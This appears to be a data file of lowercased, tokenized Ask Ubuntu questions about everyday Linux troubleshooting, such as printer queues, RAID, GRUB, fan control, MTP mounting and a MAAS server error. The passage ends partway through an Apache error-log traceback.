522931	gedit opens new windows with two tabs	when gedit is running and i open a new empty window , the window is created with 2 tabs containing untitled documents . this occurs whether i select `` open a new window '' from the dock icon or run gedit -- new-window in a terminal . the expected behavior is create only one new document in a single tab . note that this only occurs when gedit is already open . when i first open the application , a window is created with only one tab , as expected . how can i determine what is causing this problem , and how might i fix it ?
522932	how to properly detach a command ?	i have this little script i use to launch a root nautilus window ( yeah , dangerous , but sometimes necessary ) : # ! /bin/bash gksudo -- description `` launch a root nautilus '' -- sh -c `` xdg-open / & '' this works , but the system monitor shows that until the root nautilus is shut down , i have not only a root-owned nautilus process instance , but also root-owned gksudo , sudo , and xdg-open instances . i would ideally like to have just the root nautilus instance running , which is what i thought the trailing ampersand in the command-line was supposed to do . how do i get nautilus to detach properly ? can it be done at all ?
522933	reset a printer on ubuntu 14.04	what i want is a procedure that returns a printer to the `` system just booted '' state . this entails : the printer is ready and accepting jobs . the printer 's job queue is empty . maybe something else i ca n't think about . this procedure should run as a script : the point is to `` hide '' some of complexity of printing from my mother . in particular , when she printed something 'bad ' by accident , i do n't want her to go fiddling with the printing queue . better to just correct the document , run the `` reseter '' script , and print again . for that effect , i tried to use `` lprm '' , `` cancel '' and `` lpadmin '' . oddly : sudo lprm - just fails ( but that is `` ok '' , since the manpage no longer has this option ) . sudo cancel -a just fails ( even though the manpage says it should clear all queues ) . sudo cancel -a < name_of_printer > works . the current problem : sudo /usr/sbin/lpadmin -p hp5550 -e somehow `` reinserts '' the last job on the queue that cancel -a hp5550 cleared . my question : what is going on with 4 ? should i approach the problem from a different angle ? ( 1 through 3 given for context . ) another pain point ( just in case someone has a perfect solution ) is that , after clearing the queue , the printer still has part of the current job in its internal memory ( or so it seems ) . if i allow it , it will still print half a page of the old job . the only solution i see so far is to turn it off and on again .
522935	ubuntu 14.04 add control + mouse click for right click	i have a mac mouse that only has the one click option , model : m5769 . i want to add a right click option like you would have on a mac , by pressing control , and then pressing the mouse button . is there a way to do this in ubuntu 14.04 . i run the cinnamon environment . thanks for any help . med .
522939	asterisk reloads old dialplan	i installed openbts 2.6 , asterisk ( not sure about version but it 's not new ) and twinkle on ubuntu 10.10 . i edited `` sip.conf '' and `` extensions.conf '' correctly to load user accounts from it . now , when i reload dialplan , it catches some old dialplan with macros i have n't use for months and they are erased from .conf files . same thing happens again and again . it 's only type of file within asterisk folder and i ca n't solve this . if anyone know where from program loads that old dialplan and how to fix this thing , i would be grateful . i tried to reboot and change usernames to root etc ... no use . thanks .
522945	ubuntu 14.04 desktop and raid	i have 2 128gb ssds on asus zenbook . i tried to boot into ubuntu live cd ( try ubuntu ) and create raid from : then tried to instal uubuntu , but it fails to install grub on raid . another solution i tried is to install ubuntu to one ssd , then boot from live cd and create raid from disks app again , and it rsyncs disks , but after reboot newly created raid array dissapears . is there any solution to setup raid0 preferrably or raid1 on my desktop ?
522947	pygtk3 touchscreen support	does gtk3 supports touchscreen ( multitouch and gestures ) ? i want to build touch application for ubuntu desktop 14.04 using python
522948	limit recursion in apt-get install -- install-suggests	recently i tried to install a package and it 's suggests by using apt-get install tuxguitar -- install-suggests although this worked , there was far more installed than i bargained for . a total of 1308 packages were installed , including povray , fortran , texlive , apache2 , gnucash ... you get the picture . none of these items were in the install-suggests list as presented by apt-get install tuxguitar , so i must assume that the -- install-suggests option recursively looks at the packages requested and their install-suggests until a 'full ' set of packages is created . is there a clean method of limiting this recursion ? it 's not that i 'm really complaining much about some of the programs ( i like povray ) , but i like adding to my system a little at a time , trying to make sure that the os is staying stable !
522949	adding my launcher to the unity launcher automatically . how ?	based on official documentation : in order to add your launcher to the unity launcher on the left , you select and drag it onto the launcher panel . alternatively , you can place your .desktop file at /usr/share/applications/ or at ~/.local/share/applications/ . after moving your file there , search for it in the dash ( windows key - > type the name of the application ) and drag and drop it to the unity launcher . now your launcher ( .desktop file ) is locked on the unity launcher ! it means , that you can add a launcher manually via `` drag and drop '' . but , is it possible to do this programatically ? i can explain why i am asking about it : i have my own scpirt , it downloads the latest version of eclipse ide , creates eclipse.desktop file without iteraction with user . and on the last step i want to add eclipse.desktop file to unity launcher and i do not want to ask user to do it . i analized the spesification for *.desktop files and did get an answer . please provide advice .
522950	tweetdeck with wine fail	so i have ubuntu 14.04 lts in a hp pavilion 15-e050sp and i tried to install tweetdeck with wine , but when i try to run the program , it opens a blank page . i 've installed it before and it worked , but i 've formated the pc and reinstalled ubuntu 14.04 so before i uninstall ubuntu , the icon appeared normal , now appears the wine icon and when i try to run the program , it opens but the window stays white.. can anyone help me ? ? update : i allready try to uninstall and reinstall wine and tweetdeck . also tried to chang wine configurations to make tweetdeck run like in win 8 ... . ... noting happens.. can anyone help ? ( sorry for my poor english , i 'm portuguese ... )
522952	what is efi v2.31 lenovo ? where do i find it ?	at http : //www.ubuntu.com/certification/hardware/201307-13930/ the bios version it says is certified is efi v2.31 lenovo but the latest uefi version available from lenovo 's website is 2.25 how do i get the version that works ?
522953	nvidia update video driver	this is a really quick question . i tried looking around , but could n't find a definite yes or no answer . in order to update my video card driver from 331.38 to 340 or higher , do i have to remove or purge any nvidia related apps from terminal using sudo apt-get purge nvidia-338 and so on ? the driver that i am updating to is from xorg-edgers as i heard of better gaming performance with the drivers available there . what 's the proper way of upgrading drivers ? is adding the ppa , peforming a sudo apt-get update and installing nvidia-current enough , or do i have to specifically remove the old files first ? thanks
522954	setting temperature thresholds in i8kmon ubuntu 14.04	i have an overheating problem with my dell inspiron 15r and installed i8kmon to control the fan speeds on ubuntu 14.04 . here is a copy of the 'lm-sensors ' output : coretemp-isa-0000 adapter : isa adapter physical id 0 : +62.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +57.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +61.0°c ( high = +87.0°c , crit = +105.0°c ) i8k-virtual-0 adapter : virtual device right fan : 0 rpm cpu : +62.0°c even when setting the temperature thresholds in /etc/i8kmon to : set config ( daemon ) 1 # automatic fan control , override with -- auto option set config ( auto ) 1 # report status on stdout , override with -- verbose option set config ( verbose ) 1 # status check timeout ( seconds ) , override with -- timeout option set config ( timeout ) 1 # temperature thresholds : { fan_speeds low_ac high_ac low_batt high_batt } set config ( 0 ) { { 0 - } -1 55 -1 55 } set config ( 1 ) { { 1 - } 55 70 55 70 } set config ( 2 ) { { 2 - } 60 128 60 128 } the fan does not start when it should . any ideas of what might be wrong ? here is a copy of the log when running i8kmon manually with the -- verbose option : i8kmon v1.30 11/16/2013 - copyright ( c ) 2013 vitor augusto < vitorafsr @ gmail.com > config ( 0 ) = { 0 0 } -1 60 -1 65 config ( 1 ) = { 1 0 } 50 70 55 75 config ( 2 ) = { 1 1 } 60 80 65 85 config ( 3 ) = { 2 2 } 70 128 75 128 config ( acpi ) = acpi config ( auto ) = 1 config ( daemon ) = 1 config ( geometry ) = config ( i8kfan ) = /usr/bin/i8kfan config ( min_speed ) = 2000 config ( sysconfig ) = /etc/i8kmon.conf config ( t_high ) = 80 config ( timeout ) = 5 config ( unit ) = c config ( use_conf ) = 1 config ( userconfig ) = ~/.i8kmon config ( verbose ) = 1 status ( ac ) = 0 status ( acpi_timer ) = 0 status ( left ) = status ( leftspeed ) = 0 -1 -1 -1 status ( lspeed ) = 0 status ( lstate ) = 0 status ( lstuck ) = 0 status ( nfans ) = 2 status ( right ) = status ( rightspeed ) = 0 0 0 0 status ( rspeed ) = 0 status ( rstate ) = 2 status ( rstuck ) = 0 status ( state ) = 0 status ( t_high ) = 0 status ( t_low ) = 0 status ( temp ) = 0 status ( timer ) = status ( ui ) = 0 1410467738 acpi : battery 0 : discharging , 89 % , 03:13:17 remaining temp , left , right , ac state : 60 -1 2 0 # exec /usr/bin/i8kfan 0 0 temp , left , right , ac state : 59 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 58 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 58 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 60 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 58 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 59 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 58 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 58 -1 0 0 # exec /usr/bin/i8kfan 0 { } temp , left , right , ac state : 60 -1 0 0 it seems that the temperatures are wrong and i8kmon is not turning on the fan .
522955	how to change the date format in nautilus/files list columns ?	i 'd like to set nautilus ' date format to iso-8601 , but both of the old ways that answered the question for 12.04 are no longer available . how can the date format be changed now ?
522956	starting read required files in advance fails	if yi boot my lenovo yoga 2 pro laptop with ubuntu 14.04 32bit , i get these messages in my boot process : $ cat $ ( locate boot.log ) |grep required * starting read required files in advance [ fail ] * stopping read required files in advance ( for other mountpoints ) [ ok ] my mounted partitions are : $ dfc filesystem ( = ) used free ( - ) % used available total mounted on /dev/sda7 [ ================ -- -- ] 80 % 13.0g 63.9g / none [ -- -- -- -- -- -- -- -- -- -- ] 0 % 4.0k 4.0k /sys/fs/cgroup udev [ = -- -- -- -- -- -- -- -- -- - ] 0 % 3.9g 3.9g /dev tmpfs [ = -- -- -- -- -- -- -- -- -- - ] 0 % 798.6m 800.1m /run none [ -- -- -- -- -- -- -- -- -- -- ] 0 % 5.0m 5.0m /run/lock none [ = -- -- -- -- -- -- -- -- -- - ] 0 % 3.9g 3.9g /run/shm none [ = -- -- -- -- -- -- -- -- -- - ] 0 % 100.0m 100.0m /run/user /dev/sda11 [ ================= -- - ] 80 % 6.4g 31.9g /home /dev/sda6 [ ==================== ] 99 % 576.0m 54.3g /media/daten /dev/sda5 [ ===================- ] 92 % 5.1g 67.5g /media/win8 the boot continues and everything seems to work fine , but what does this mean and do i have to worry about it ?
522961	mounting galaxy s4 ubuntu 14.04	i know this has topic has been touched on a lot , and i have tried just about anything i have read and still have no solution . be aware , still relatively a noob with linux . the problem is as simple as the title , i cant mount my rooted galaxy s4 phone ( newest update 4.4.2 ) on my laptop ( running ubuntu 14.04 lts ) . the error message is a consistent unable to open mtp device ' [ usb:002,008 ] ' with the numbers changing depending on how many times i try and which usb port i use . let me be clear of my precautions . i have usb debugging mode set to off , and stay awake mode on ( so that phone screen does n't lock ) . heres what i have tried i have installed the mtp-tools here and from others . sudo apt-get install libmtp-common mtp-tools libmtp-dev libmtp-runtime libmtp9 i have edited the /etc/fuse.conf file to not include the last comment. '' # allow non-root users to specify the allow_other or allow_root mount options . user_allow_other `` i have edited the /lib/udev/rules.d/69-libmtp.rules to include my phone with vendorid and productid '' # galaxy s4 attr { idvendor } == '' 04e8 '' , attr { idproduct } == '' 6860 '' , symlink+= '' libmtp- % k '' , env { id_mtp_device } = '' 1 '' , env { id_media_player } = '' 1 '' '' and i have edited the /etc/udev/rules.d/51-android.rules attr { idvendor } == '' 04e8 '' , attr { idproduct } == '' 6860 '' , mode=â0666 '' i have installed gvfs . nothing has worked . any suggestions are greatly appreciated . will run any command and post outputs if needed .
522962	trying to upgrade to 14.04 from 13.10 , and i keep getting the same error message	i 've had no problems upgrading from one version of ubuntu to the next until lately . now , every time i attempt to upgrade , i get the following error message : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found [ ip : 91.189.91.14 80 ] , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found [ ip : 91.189.91.14 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . there was a bit more but i ca n't post more than 2 links currently . any ideas ?
522965	how do i make a chromium application shortcut that works properly while not on the desktop ?	this question is more related to unity than chromium itself . when i make an application shortcut , the .desktop file works but when i move it to another folder like /documents/webapps , then lock it to the launcher ; i 'll click it from the launcher and it does n't properly display the icon on the launcher . it will open under a different icon than the one i clicked ; an icon that just appears . this does n't happen if i keep the actual .desktop file on the desktop . i 'm sort of a neat freak and do n't like keeping things on my desktop . i 'd like to access my gmail and google drive from the launcher but that 's kind of pointless if the only place i can keep the shortcut is on the desktop . sorry if this question is a little wordy if this is a simple problem but i 'm new to ubuntu and i do n't know if it really is a simple problem . # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 terminal=false type=application name=gmail exec=/usr/bin/chromium-browser -- app=https : //mail.google.com/mail/u/0 icon=/home/jake/.gnome/apps/gmail-logo.png startupwmclass=mail.google.com__mail_u_0 name [ en_us ] =gmail
522966	start a second wifi on laptop	i use standard ubuntu 14.04 with network-manager . i am connected to a wifi with my second wlan1 card . how do i tell network-manager to let me configure my wlan0 card on my own with ifconfig ? in the end i would like to adapt this script , so it leaves the control of wlan1 to network-manager
522967	ubuntu upgrades break ethernet connection	after performing updates on my newly installed ubuntu 14.04 on lenovo t440p , the ethernet connection stops working . i now have no way to connect it to the internet ( wi-fi never worked . i was planning to tackle that next ) . how do i find out what 's going wrong ? lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:01.1 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x8 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-lm ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) 00:1c.1 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 2 ( rev d4 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm87 express lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) 02:00.0 vga compatible controller : nvidia corporation gk208m [ geforce gt 730m ] ( rev a1 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5227 pci express card reader ( rev 01 ) 04:00.0 network controller : realtek semiconductor co. , ltd. rtl8192ee pcie wireless network adapter dmesg |grep -i eth [ 0.979465 ] e1000e 0000:00:19.0 eth0 : registered phc clock [ 0.979468 ] e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) 28 : d2:44 : bf : b3:3c [ 0.979469 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 0.979498 ] e1000e 0000:00:19.0 eth0 : mac : 11 , phy : 12 , pba no : 1000ff-0ff [ 1.451758 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 1.563023 ] vga switcheroo : detected optimus dsm method \_sb_.pci0.peg_.vid_ handle [ 1.736366 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 2.484106 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 2.484325 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 4.203411 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx [ 4.203414 ] e1000e 0000:00:19.0 eth0 : 10/100 speed : disabling tso [ 4.203442 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready ifconfig eth0 link encap : ethernet hwaddr 28 : d2:44 : bf : b3:3c inet6 addr : fe80 : :2ad2:44ff : febf : b33c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:70 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:13978 ( 13.9 kb ) interrupt:20 memory : f1600000-f1620000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1184 ( 1.1 kb ) tx bytes:1184 ( 1.1 kb )
522969	restoring the applications settings	i am reinstalling ubuntu with a separate home partition . i have been told that when i do this all the data in the home partition will not be harmed ( when i use manual partitioning of course ) and that all my `` installed applications settings will remain '' . if i want to reset these settings to their default without removing my data . thanks in advance .
522977	what is this folder named `` ptzuzpsg8d '' in my home directory ?	i am running ubuntu 14.04 lts . i have a folder named `` ptzuzpsg8d '' in my home folder . honestly , it has been sitting there for a few days . today , when i tried to shift+delete it , it started preparing the folder for deletion and indexed a total of 830,072 items occupying 303 mb of disk space . the delete operation is going on right now and the file operations dialog reads 1 hour and 3 minutes left . how did this cryptic named folder appear on my pc ? is my pc infected ?
522978	please some help with authentication and apache 2.4	running latest ubuntu 14.04 just installed apache 2.4 and to my dismay authentication doesnt seem to be working and theyve changed /var/www to /var/www/html so i adjusted my usual default under sites-available and changed /var/www to /var/www/html in all places group file authentication doesnt seem to be working at all . what i have is options followsymlinks allowoverride none authtype basic authname `` by invitation only '' authuserfile `` /etc/apache2/passwords '' authgroupfile `` /etc/apache2/groups/group '' require group admin and ofcourse group looks like this admin : userhere , userhere , userhere but this is not working where it worked just fine before , any help would be greatly appreciated i do have the correct auth modules compiled with apache and they are visible under mods-enabled
522981	problem with partitions ( deleted all of them )	a few months ago , i had windows 8 as the only operative system on my computer and i wanted to install ubuntu , having both operative systems on my pc ( dual boot ) . however , after supposedly installing ubuntu , i wanted both ubuntu and windows 8 to appear on the screen when booting ( so i could choose which one i wanted to work with ) , and that 's when the problem appeared ... in the terminal , i followed a tutorial that could make the dual boot work ( i do n't remember what i wrote ) and , all of a sudden , all of my partitions were gone . i initiated the computer again and it would go straight to the bios . then , after several tries , i somehow installed ubuntu and have been working on it since . however , i know that all of my partitions are messed up and now that i need both windows and ubuntu on my pc , i want to delete the current ubuntu that i have and start working on the computer like it did n't have any operative systems ( install both windows and ubuntu from scratch ) . i really appreciate any help that you can give . i attached a print screen of gparted ( http : //i.imgur.com/kg9kqbw.png ? 1 ) , which shows all of the partitions on the computer .
522983	lubuntu ca n't start softwares	i 've just downloaded lubuntu 14.04 and each software i download , i do n't know how to open it . for example i just downloaded unetbootin , but when i double click on it , it wo n't start . same for others like wine . i downloaded unetbootin from the official site and the linux version . what should i do ? thank you .
522984	ca n't boot to windows after removing ubuntu	if this is not the right place , please tell me where to ask this . i tried to remove ubuntu from windows , and i deleted the partitions . after starting up windows , i executed in command line : bootrec /fixmbr and bootrec /fixboot , and expected to start windows normally , i did n't . when i restarted , it showed me something like `` bad configuration booting '' , i do n't really remember , and i do n't have access to the error anymore , because i installed xubuntu . in the installation , xubuntu did n't recognized any os on the computer , but i have access to data in windows . currently , i 'm trapped in xubuntu , which is a horrible thing , because i need windows really bad . i beg you to help me
522985	ubuntu server 14.04 -- how to install sun grid engine ?	i am trying to search around a tutorial to install sun grid engine on ubuntu server 14.04 without much success . i came to this article , but got into the error such as : http : //www.socher.org/index.php/main/howtoinstallsungridengineonubuntu sudo qmon warning : can not convert string `` intro '' to type pixmap sudo sge_execd error : communication error for `` localhost/execd/1 '' running on port 6445 : `` ca n't bind socket '' did ubuntu still support this package ? or there is other better alternatives ? thanks
522994	php5-fpm w/apache2 fastcgi error -1 copy file failed	i 'm using php5-fpm with apache2 and i 'm receiving the below error message . fastcgi : comm with server `` /var/lib/apache2/fastcgi/php5.fcgi '' aborted : error parsing headers : invalid status '-1 copy file failed ' , referer : https : //www.website.com/administrator/index.php ? option=com_installer
523000	how do i make my grub arguments permanent ?	whenever i boot my laptop , the grub terminal comes up and i have to input the following three lines to boot into my os : linux ( hd0 , msdos1 ) /vmlinuz root=/dev/sda1 initrd ( hd0 , msdos1 ) /initrd.img boot what options should i add to /etc/default/grub so that grub would n't need manual input at boot ?
523004	how to install crosssover in utopic	instruction in software center require installation of architecture i386 with `` sudo dpkg -add-architecturei386 '' utopic does not recognize dpkg command .
523010	problem in installing packages like xgraph , autoconf , libxll-dev on ubuntu 10.04	i am not able to install packages like xgraph , autoconf , libxll-dev on ubuntu 10.04 that i have installed on my system . kindly help raman
523014	need help on checking ubuntu live cd	i have created an ubuntu live cd . i succesfully verified the sha256 sum of the .iso file using the intructions here : https : //help.ubuntu.com/community/howtosha256sum the problem is the next part on the page above which is to `` check the cd '' . after i burn the .iso i follow the instructions and enter sha256sum /dev/cdrom in terminal then i check the output against the ubuntu hashes page except the output does n't match . it is quite a bit longer than the ones listed on the page . am i checking in the write place ? need some help with this . they also mention a way of checking the integrity of the cd when you boot it : `` so far so good , you have downloaded an iso and verified its integrity . when you boot from the cd you will be given the option to test its integrity . '' i do not see this option at all . any help appreciated .
523016	i think i deleted bash !	i am attempting to make a pxe server that will boot ubuntu ( live cd ) 14.04 . i was trying to copy the bash file from /bin/bash to /var/lib/tftpboot/ubuntu/bin/bash i must have used the `` mv '' command instead . now , i ca n't log in via ssh ( or even the local console ) ! i am running ubuntu server 14.04 under virtualbox . when i try to log in , i get this message : can not execute /bin/bash : no such file or directory then , i am immediately logged back out . any suggestions ?
523017	ubuntu server 14 maas : 500 internal server error	i have made a fresh install of ubuntu server 14 with maas . when i go to http : //xxx.xxx.xxx.xxx/maas i get a 500 internal server error . i was able to get on the web interface previously , but after i installed the boot images this seems to happen . the following is my apache2 error.log [ thu sep 11 18:02:46.066402 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] mod_wsgi ( pid=2453 ) : target wsgi script '/usr/share/maas/wsgi.py ' can not be loaded as python module . [ thu sep 11 18:02:46.066464 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] mod_wsgi ( pid=2453 ) : exception occurred processing wsgi script '/usr/share/maas/wsgi.py ' . [ thu sep 11 18:02:46.066514 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] traceback ( most recent call last ) : [ thu sep 11 18:02:46.066554 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/share/maas/wsgi.py '' , line 32 , in < module > [ thu sep 11 18:02:46.066613 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] start_up ( ) [ thu sep 11 18:02:46.066637 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 59 , in start_up [ thu sep 11 18:02:46.066674 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] post_start_up ( ) [ thu sep 11 18:02:46.066695 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 96 , in post_start_up [ thu sep 11 18:02:46.066726 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] nodegroup.objects.refresh_workers ( ) [ thu sep 11 18:02:46.066747 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/maasserver/models/nodegroup.py '' , line 125 , in refresh_workers [ thu sep 11 18:02:46.066779 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] refresh_worker ( nodegroup ) [ thu sep 11 18:02:46.066799 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/maasserver/refresh_worker.py '' , line 41 , in refresh_worker [ thu sep 11 18:02:46.066831 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] refresh_secrets.apply_async ( queue=nodegroup.work_queue , kwargs=items ) [ thu sep 11 18:02:46.066851 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/celery/app/task.py '' , line 554 , in apply_async [ thu sep 11 18:02:46.066883 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] **dict ( self._get_exec_options ( ) , **options ) [ thu sep 11 18:02:46.066903 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/celery/app/base.py '' , line 320 , in send_task [ thu sep 11 18:02:46.066934 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] reply_to=reply_to or self.oid , **options [ thu sep 11 18:02:46.066954 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/celery/app/amqp.py '' , line 299 , in publish_task [ thu sep 11 18:02:46.066984 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] **kwargs [ thu sep 11 18:02:46.067005 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/messaging.py '' , line 166 , in publish [ thu sep 11 18:02:46.067035 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] routing_key , mandatory , immediate , exchange , declare ) [ thu sep 11 18:02:46.067055 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/connection.py '' , line 461 , in _ensured [ thu sep 11 18:02:46.067086 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] interval_max ) [ thu sep 11 18:02:46.067105 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/connection.py '' , line 373 , in ensure_connection [ thu sep 11 18:02:46.067135 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] interval_start , interval_step , interval_max , callback ) [ thu sep 11 18:02:46.067168 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/utils/__init__.py '' , line 228 , in retry_over_time [ thu sep 11 18:02:46.067201 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] return fun ( *args , **kwargs ) [ thu sep 11 18:02:46.067221 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/connection.py '' , line 244 , in connect [ thu sep 11 18:02:46.067251 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] return self.connection [ thu sep 11 18:02:46.067271 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/connection.py '' , line 751 , in connection [ thu sep 11 18:02:46.067301 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] self._connection = self._establish_connection ( ) [ thu sep 11 18:02:46.067321 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/connection.py '' , line 710 , in _establish_connection [ thu sep 11 18:02:46.067352 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] conn = self.transport.establish_connection ( ) [ thu sep 11 18:02:46.067372 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/kombu/transport/pyamqp.py '' , line 111 , in establish_connection [ thu sep 11 18:02:46.067403 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] conn = self.connection ( **opts ) [ thu sep 11 18:02:46.067423 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/amqp/connection.py '' , line 148 , in __init__ [ thu sep 11 18:02:46.067454 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] self.transport = create_transport ( host , connect_timeout , ssl ) [ thu sep 11 18:02:46.067474 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/amqp/transport.py '' , line 300 , in create_transport [ thu sep 11 18:02:46.067504 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] return tcptransport ( host , connect_timeout ) [ thu sep 11 18:02:46.067524 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] file `` /usr/lib/python2.7/dist-packages/amqp/transport.py '' , line 109 , in __init__ [ thu sep 11 18:02:46.067553 2014 ] [ : error ] [ pid 2453 : tid 140118987958016 ] [ remote 192.168.0.11:39965 ] raise socket.error ( last_err ) [ thu sep 11 18:02:46.067590 